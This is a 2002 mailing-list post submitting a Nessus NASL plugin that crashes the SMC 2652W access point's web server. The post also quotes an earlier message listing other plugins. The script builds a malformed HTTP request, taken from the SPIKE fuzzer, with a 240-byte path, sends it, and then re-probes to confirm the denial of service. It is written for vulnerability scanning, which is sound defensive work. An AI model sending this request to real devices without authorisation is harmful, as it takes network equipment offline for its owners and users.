Since my last 4 nasls just made it to CVS, does that mean I can send more
now? ;-)
The script below took essentially no effort on my part: the request string comes straight
from Dave Aitel's SPIKE fuzzer, so the credit belongs there.
#
# Copyright 2002 by John Lampe ... j_lampe@bellsouth.net
# BUG FOUND WITH SPIKE 2.7
# See the Nessus Scripts License for details
#
if (description)
{
  script_id();
  script_version("$Revision: 0.1 $");

  # Registration data for the Nessus plugin database: the literals are
  # passed straight to the registration calls instead of going through
  # the name[]/desc[]/summary[] arrays.
  script_name(english:"Crash SMC AP");
  script_description(english:"
The SMC 2652W Access point web server crashes when sent a specially
formatted HTTP request. Contact vendor
for a fix
Risk factor : Medium/Low");
  script_summary(english:"Crash SMC Access Point");

  # ACT_DENIAL: this is a crash test, not a banner check -- a successful run
  # leaves the access point's web server dead, so it is registered as a
  # denial-of-service plugin.
  script_category(ACT_DENIAL);
  script_copyright(english:"This script is Copyright (C) 2002 John Lampe...j_lampe@bellsouth.net");
  script_family(english:"General");
  exit(0);
}
#
# The script code starts here
#
# found with SPIKE 2.7 http://www.immunitysec.com/spike.html
# req string directly horked from SPIKE API
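# Use the web server port Nessus already found (default 80). Stop if that
# port is not open: otherwise both connects below would fail and we would
# report a crash that never happened.
port = get_kb_item("Services/www");
if (!port) port = 80;
if (!get_port_state(port)) exit(0);

# The request below is the SPIKE 2.7 fuzz case that took the device down,
# reproduced as captured: a 240-byte path component followed by a
# Domino-style query string, and a Content-length header for a body that is
# never sent. Do not "tidy" these headers -- they are the test case, and it
# is not known which part of the request the firmware actually chokes on.
req = string("GET /", crap(240), ".html?OpenElement&FieldElemFormat=gif HTTP/1.1\r\n");
req = string(req, "Referer: http://localhost/bob\r\n");
req = string(req, "Content-Type: application/x-www-form-urlencoded\r\n");
req = string(req, "Connection: Keep-Alive\r\n");
req = string(req, "Cookie: VARIABLE=DAVEAITEL; path=/\r\n");
req = string(req, "User-Agent: Mozilla/4.76 [en] (X11; U; Linux 2.4.2-2 i686)\r\n");
req = string(req, "Variable: result\r\n");
req = string(req, "Host: localhost\r\nContent-length: 13\r\n");
req = string(req, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png\r\n");
req = string(req, "Accept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n");

# Deliver the crash request. If we cannot connect at all, the service was
# never reachable from here and a later connect failure proves nothing, so
# exit instead of falling through to the re-check and reporting a hole.
soc = open_sock_tcp(port);
if (!soc) exit(0);
send(socket:soc, data:req);
close(soc);

# Give the device a moment to fall over before probing again; a reconnect
# issued the instant the first socket closes can fail for reasons unrelated
# to the crash (connection limits on a small embedded server, for example).
sleep(1);

# Re-probe with a harmless GET. A server that no longer accepts connections,
# or accepts one but sends nothing back within the timeout, is treated as
# crashed. Always close the probe socket; the original leaked it.
soc = open_sock_tcp(port);
if (!soc) { security_hole(port); exit(0); }
send(socket:soc, data:string("GET / HTTP/1.0\r\n\r\n"));
bling = recv(socket:soc, length:1024, timeout:5);
close(soc);
if (!bling) security_hole(port);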
John Lampe
https://f00dikator.hn.org/ "Knowledge will forever govern ignorance, and a people who mean to be their
own governors, must arm themselves with the power knowledge gives. A popular
government without popular information or the means of acquiring it, is but
a prologue to a farce or a tragedy or perhaps both."
--James Madison
----- Original Message -----
From: "Thomas Reinke" <reinke@e-softinc.com>
To: "John Lampe" <j_lampe@bellsouth.net>
Cc: "plugins writer" <plugins-writers@list.nessus.org>; "Renaud Deraison"
<deraison@cvs.nessus.org>
Sent: Wednesday, October 09, 2002 3:23 PM
Subject: Re: Scripts
John Lampe wrote:
> 4 scripts here.
> citrix.nasl looks for citrix published applications (based on perl script
by
> ian.vitek@ixsecurity.com)
> sql_injection.nasl tries to poison cgi params (based on wpoison)
> uddi.inc is an include file for creating SOAP headers
> uddi.nasl looks for .net servers which have public web services being
> offered via uddi registry (should maybe add DISCO in the future?)
>
> John Lampe
> https://f00dikator.hn.org/
>
> "Knowledge will forever govern ignorance, and a people who mean to be
their
> own governors, must arm themselves with the power knowledge gives. A
popular
> government without popular information or the means of acquiring it, is
but
> a prologue to a farce or a tragedy or perhaps both."
> --James Madison
>
Any reason why these haven't been included in the standard
distribution of nasl scripts?
Thomas